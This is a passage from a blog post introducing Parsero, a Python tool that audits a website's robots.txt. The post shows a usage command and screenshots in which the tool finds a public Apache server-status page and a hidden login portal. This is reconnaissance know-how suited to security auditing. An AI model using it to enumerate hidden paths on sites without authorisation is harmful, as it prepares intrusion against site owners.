<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuN2wV88wjSmHwe96dQIo1wAFPvIRIexPFXMJzKWbi7GSBrZ2fICXeZOMwvf4-vgSxxw6u5f2VJTbtPhnt91XDjcvj2SAgxqGgaQ6i4v3QSaFZiOMBVlb1_l77nBy0zXZTApBYWt6iZVU/s1600/Parsero_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuN2wV88wjSmHwe96dQIo1wAFPvIRIexPFXMJzKWbi7GSBrZ2fICXeZOMwvf4-vgSxxw6u5f2VJTbtPhnt91XDjcvj2SAgxqGgaQ6i4v3QSaFZiOMBVlb1_l77nBy0zXZTApBYWt6iZVU/s1600/Parsero_9.png" /></a></div>
<br />
You can do this task automatically using Parsero with the command:<br />
<pre class="brush: java">python parsero.py -u www.example.com </pre>
<br />
<div style="text-align: justify;">
Notice in the picture below that the green links are the links which are available in the web server. You don't need to waste your time checking the other links, just clicking on the green links.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNRf02JsM6kP9IXCB4NTQ-2HgpWwK1pgW3KkB3xmNdRurPf2qoRqFz2w_9y6ZIOBoQ2i5oZb2eISCs_JcWIY219wGeGLE7tejnT_UD9cK7Oz9h4Z3qIoViuVKIBM98Lu9UmZCXvwrci5o/s1600/Parsero_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNRf02JsM6kP9IXCB4NTQ-2HgpWwK1pgW3KkB3xmNdRurPf2qoRqFz2w_9y6ZIOBoQ2i5oZb2eISCs_JcWIY219wGeGLE7tejnT_UD9cK7Oz9h4Z3qIoViuVKIBM98Lu9UmZCXvwrci5o/s640/Parsero_10.png" height="340" width="640" /></a></div>
<br />
<div style="text-align: justify;">
If we visit the www.example.com/server-status/ we can see the Apache logs which are public but hidden for the crawlers...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU-FuT-kVcBmTnhH51RRBibN-mh_DHv7d-vwpRrqb8Z7LLFqUBLJO3Dfxwu6j3KQN67jvsSi1QGxNGPT3qfw1VU4ZbF7BTdv_5Jp4npVwoQL62tBF6-IF41SG9mIG15J0Pw10HnuzHMUk/s1600/Parsero_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU-FuT-kVcBmTnhH51RRBibN-mh_DHv7d-vwpRrqb8Z7LLFqUBLJO3Dfxwu6j3KQN67jvsSi1QGxNGPT3qfw1VU4ZbF7BTdv_5Jp4npVwoQL62tBF6-IF41SG9mIG15J0Pw10HnuzHMUk/s640/Parsero_11.png" height="204" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3>
Example 2</h3>
In the picture below you can see another robots.txt. The picture has been cut because this server has a lot of Disallow. Can you imagine checking all of them manually?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHKY4_n1xbpOql2SKpTWtP5iOrskPVJlKDsWPduT-hqLDXk32UoLp0NIFa6MyJUIJS30QBgt-_iPd-5vgPCB9KFzDp5SlfFtu_i-Gcjzyb2pHyh2ePmErsWWBnhKpycZS4_qopXQVX7cE/s1600/Pasero_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHKY4_n1xbpOql2SKpTWtP5iOrskPVJlKDsWPduT-hqLDXk32UoLp0NIFa6MyJUIJS30QBgt-_iPd-5vgPCB9KFzDp5SlfFtu_i-Gcjzyb2pHyh2ePmErsWWBnhKpycZS4_qopXQVX7cE/s1600/Pasero_5.png" /></a></div>
<div class="" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
If you use Parsero, you will audit all the Robots.txt file in just a seconds...</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwMIXqupinVb1JgXdZrl7xnSTmumCkMCftTBoirqpzmWy_gabU4VPKsnW4UjOtSUoEb2xyYGKvS73UjKA1tWCO1Mt2Mz-ib1UMUXFjpRYsJgVulXpbsE1FxFIUBiCaNUfLsxuhrR-waX4/s1600/Parsero_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwMIXqupinVb1JgXdZrl7xnSTmumCkMCftTBoirqpzmWy_gabU4VPKsnW4UjOtSUoEb2xyYGKvS73UjKA1tWCO1Mt2Mz-ib1UMUXFjpRYsJgVulXpbsE1FxFIUBiCaNUfLsxuhrR-waX4/s640/Parsero_6.png" height="505" width="640" /></a></div>
<br />
... and discover for example, the portal login for this site.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifrKdgCnUKSqJp14bE_uNmvLEjxz6XYimP9_kDJ07QVG4898maBgmk4o90wfixEZwTZpg6Rs3ui0S_oKy-JFIJz5574uAdMY4lDl6F0z0wyx1M9f2bkEXXRMKRiwtvxKlX_CIjRYnT02o/s1600/Parsero_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifrKdgCnUKSqJp14bE_uNmvLEjxz6XYimP9_kDJ07QVG4898maBgmk4o90wfixEZwTZpg6Rs3ui0S_oKy-JFIJz5574uAdMY4lDl6F0z0wyx1M9f2bkEXXRMKRiwtvxKlX_CIjRYnT02o/s400/Parsero_7.png" height="180" width="400" /></a></div>
<h3>
The future of Parsero</h3>
<div style="text-align: justify;">
I am working on developing new features of this tool which will be delivered in the next months... I would be really grateful if you decide to give me your feedback about this tool.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I want to give the thanks to <a href="https://twitter.com/cor3dump3d" target="_blank">cor3dump3d</a> for his support and help!!! He has saved me a lot of time thanks to sharing his knwoledge of Python with me!!</div>
<br />
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com11